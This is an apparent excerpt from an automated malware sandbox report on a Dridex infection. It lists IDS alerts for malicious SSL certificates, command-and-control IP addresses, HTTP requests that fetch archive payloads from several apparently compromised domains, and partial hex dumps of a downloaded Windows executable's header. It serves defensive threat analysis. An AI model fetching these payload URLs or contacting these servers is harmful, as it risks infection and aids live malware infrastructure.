Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49259
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49264
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49263
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49265
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49265
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49267
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49267
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49266
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49269
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49270
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49271
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49273
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49273
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49275
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49276
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49278
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49278
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49279
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49280
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49280
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49281
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49281
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49283
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49282
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49288
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49287
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49289
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49289
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49290
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49290
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49292
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49293
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49294
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49296
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49296
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49286
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49297
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49298
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49299
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49299
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49302
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49301
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49303
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49303
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49304
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49305
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49309
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49310
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49313
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49313
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49314
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49314
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49311
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49315
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49315
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 69.164.207.140:3388
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 198.57.200.100:3786
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 20 Jan 2021 15:13:16 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Tue, 12 Jan 2021 11:40:23 GMTAccept-Ranges: bytesContent-Length: 765440Keep-Alive: timeout=5, max=75Content-Type: application/x-rar-compressedData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 31 35 51 21 75 54 3f 72 75 54 3f 72 75 54 3f 72 a8 ab f1 72 74 54 3f 72 78 06 e2 72 77 54 3f 72 78 06 e0 72 74 54 3f 72 78 06 df 72 7a 54 3f 72 78 06 de 72 77 54 3f 72 a8 ab f4 72 76 54 3f 72 75 54 3e 72 3c 54 3f 72 78 06 e3 72 74 54 3f 72 78 06 da 72 7a 54 3f 72 78 06 e4 72 74 54 3f 72 78 06 e1 72 74 54 3f 72 52 69 63 68 75 54 3f 72 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 15 df dc 52 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0c 00 00 64 0b 00 00 16 01 00 00 00 00 00 98 6f 0a 00 00 10 00 00 00 80 0b 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 0c 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 72 0b 00 4d 00 00 00 5c 71 0c 00 3c 00 00 00 00 80 0c 00 10 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 0c 00 e8 1a 00 00 60 10 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 f4 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 0c 00 5c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ad 62 0b 00 00 10 00 00 00 64 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c8 e8 00 00 00 80 0b 00 00 1a 00 00 00 68 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 20 09 00 00 00 70 0c 00 00 0a 00 00 00 82 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 10 05 00 00 00 80 0c 00 00 06 00 00 00 8c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e8 1a 00 00 00 90 0c 00 00 1c 00 00 00 92 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 20 Jan 2021 15:13:25 GMTServer: ApacheLast-Modified: Mon, 11 Jan 2021 21:14:58 GMTAccept-Ranges: bytesContent-Length: 765440Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/zipData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 31 35 51 21 75 54 3f 72 75 54 3f 72 75 54 3f 72 a8 ab f1 72 74 54 3f 72 78 06 e2 72 77 54 3f 72 78 06 e0 72 74 54 3f 72 78 06 df 72 7a 54 3f 72 78 06 de 72 77 54 3f 72 a8 ab f4 72 76 54 3f 72 75 54 3e 72 3c 54 3f 72 78 06 e3 72 74 54 3f 72 78 06 da 72 7a 54 3f 72 78 06 e4 72 74 54 3f 72 78 06 e1 72 74 54 3f 72 52 69 63 68 75 54 3f 72 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 15 df dc 52 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0c 00 00 64 0b 00 00 16 01 00 00 00 00 00 98 6f 0a 00 00 10 00 00 00 80 0b 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 0c 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 72 0b 00 4d 00 00 00 5c 71 0c 00 3c 00 00 00 00 80 0c 00 10 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 0c 00 e8 1a 00 00 60 10 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 f4 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 0c 00 5c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ad 62 0b 00 00 10 00 00 00 64 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c8 e8 00 00 00 80 0b 00 00 1a 00 00 00 68 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 20 09 00 00 00 70 0c 00 00 0a 00 00 00 82 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 10 05 00 00 00 80 0c 00 00 06 00 00 00 8c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e8 1a 00 00 00 90 0c 00 00 1c 00 00 00 92 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 20 Jan 2021 15:14:27 GMTServer: ApacheStrict-Transport-Security: max-age=63072000; includeSubdomains;X-Frame-Options: SAMEORIGINLast-Modified: Thu, 14 Jan 2021 04:03:15 GMTAccept-Ranges: bytesContent-Length: 765440Cache-Control: max-age=2592000Expires: Fri, 19 Feb 2021 15:14:27 GMTKeep-Alive: timeout=5, max=50Connection: Keep-AliveContent-Type: application/zipData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 31 35 51 21 75 54 3f 72 75 54 3f 72 75 54 3f 72 a8 ab f1 72 74 54 3f 72 78 06 e2 72 77 54 3f 72 78 06 e0 72 74 54 3f 72 78 06 df 72 7a 54 3f 72 78 06 de 72 77 54 3f 72 a8 ab f4 72 76 54 3f 72 75 54 3e 72 3c 54 3f 72 78 06 e3 72 74 54 3f 72 78 06 da 72 7a 54 3f 72 78 06 e4 72 74 54 3f 72 78 06 e1 72 74 54 3f 72 52 69 63 68 75 54 3f 72 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 15 df dc 52 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0c 00 00 64 0b 00 00 16 01 00 00 00 00 00 98 6f 0a 00 00 10 00 00 00 80 0b 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 0c 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 72 0b 00 4d 00 00 00 5c 71 0c 00 3c 00 00 00 00 80 0c 00 10 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 0c 00 e8 1a 00 00 60 10 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 f4 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 0c 00 5c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ad 62 0b 00 00 10 00 00 00 64 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c8 e8 00 00 00 80 0b 00 00 1a 00 00 00 68 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 20 09 00 00 00 70 0c 00 00 0a 00 00 00 82 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 10 05 00 00 00 80 0c 00 00 06 00 00 00 8c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e8 1a 00 00 00 90 0c 00 00 1c 00 00 00 92 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: Joe Sandbox ViewIP Address: 198.57.200.100 198.57.200.100
Source: Joe Sandbox ViewIP Address: 69.164.207.140 69.164.207.140
Source: Joe Sandbox ViewJA3 fingerprint: eb88d0b3e1961a0562f006e5ce2a0b87
Source: global trafficHTTP traffic detected: GET /h79fwesfe.rar HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: monitrade.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ys95lm6k.rar HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: bafnabrotherskesarwala.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /xkpffwn.zip HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: artec.com.trConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ylztwx.rar HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.gastronauts.asiaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /uzssv27.rar HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: laureys.beConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: laureys.beConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /by9zwa7p1.zip HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: cms.ivpr.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /d8ms3mljy.zip HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: salaodigitalautomovel.pt.deve.ptConnection: Keep-Alive
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49179 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49183 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49186 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49187 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49191 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49192 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49199 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49204 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49209 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49212 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49216 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49222 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49225 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49228 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49232 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49238 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49241 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49244 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49246 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49249 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49256 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49257 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49260 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49264 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49270 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49271 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49279 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49283 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49288 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49293 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49294 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49286 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49302 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49305 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49309 version: TLS 1.0
Source: unknownTCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknownTCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknownTCP traffic detected without corresponding DNS query: 194.225.58.214
